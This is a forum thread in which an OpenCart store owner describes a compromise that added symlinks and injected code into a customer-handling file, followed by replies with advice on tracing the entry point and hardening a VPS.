OpenCart Community

Had an attempted hack that added a bunch of symlinks and also found a line embedded in opencarts system/library/cart/customer.php file
I assume they were trying to steal customer information considering it was in that file. It broke the store so found it pretty fast in that file but wanted to let everyone know to watch out for this. I deleted all the symlinks and cleared caches and everything is fine again, but definitely watch out for it. Also changed all my passwords of course.

If there's a file in your site that you didn't put there, that wasn't an attempted hack; it was a hack.

Do you know how they were able to get that file onto your server? (If you're on a shared server, your host would know the method of operation).

If it were through OpenCart and not an unpatched OS/php version, a fix needs to be implemented to all of our carts asap.

I said "attempted" since the hacker fouled up the code they tried to inject and it just caused an error rather than their getting any info.

Suspect they came thru wordpress even though I had wordfence and other security installed. Found some files in each of my 4 wp installations that I removed.

I just moved to a VPS and isolated my wordpress installations on their on cpanels away from my opencart installation. I had actually planned to go to a vps early next year, so just did it a little earlier than planned. Also rolled back to before the hack occurred, all with a big thanks to Evolve for helping me work thru the issue. Great support as always.

Oh I see, sorry - didn't really look their code.

(Assuming this is your first VPS/dedicated server and you're on a Linux-based OS):
Now that you're on a VPS the onus is on you to keep the OS up-to-date, as well as any dependencies.
If you have a WHM account that'll simplify things greatly for you as you can do pretty much everything, short of OS & kernel updates from within the WHM admin.

If you don't already have it, utilizing CSF, logwatch, rkhunter and clamAv are good starting points.
Also disable expose_php via php.ini
Turn off Apache server tokens
If you're willing to invest a bit of time testing, mod_security as well; but you'll need to thoroughly test your cart. Out of the box a lot of rules are triggered by OpenCart.

https://www.linode.com/docs/security/se ... frequently
https://documentation.cpanel.net/displa ... -+Security

WordPress would be my first guess at entry too. Definitely keep it (and all add-ons) up-to-date & isolated.

Side note: Simply creating a separate cpanel account for the Wordpress installs won't guarantee they're isolated; make sure permissions are set properly (no chmod 777!) and disable shell access for them.